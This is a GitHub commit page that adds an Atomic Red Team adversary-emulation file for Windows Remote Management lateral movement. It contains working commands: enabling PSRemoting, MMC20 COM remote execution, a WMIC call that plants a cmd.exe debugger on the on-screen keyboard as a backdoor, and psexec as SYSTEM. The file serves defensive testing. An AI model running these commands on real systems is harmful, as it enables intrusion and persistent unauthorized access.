Skip to content

Commit

Permalink
T1028
Browse files Browse the repository at this point in the history
1028 inbound hot! 🔥
  • Loading branch information
Michael Haag authored and Michael Haag committed May 25, 2018
1 parent 24c91de commit ff46dfd
Showing 1 changed file with 90 additions and 0 deletions.
90 changes: 90 additions & 0 deletions atomics/T1028/T1028.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,90 @@
---
attack_technique: T1028
display_name: Windows Remote Management

atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
supported_platforms:
- windows

executor:
name: powershell
command: |
powershell Enable-PSRemoting -Force
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
supported_platforms:
- windows

input_arguments:
computername:
description: Name of Computer
type: string
default: computer1

executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
supported_platforms:
- windows

input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target

executor:
name: command_prompt
command: |
wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
- name: Psexec
description: |
Utilize psexec to start remote process
supported_platforms:
- windows

input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target

executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe

0 comments on commit ff46dfd

Please sign in to comment.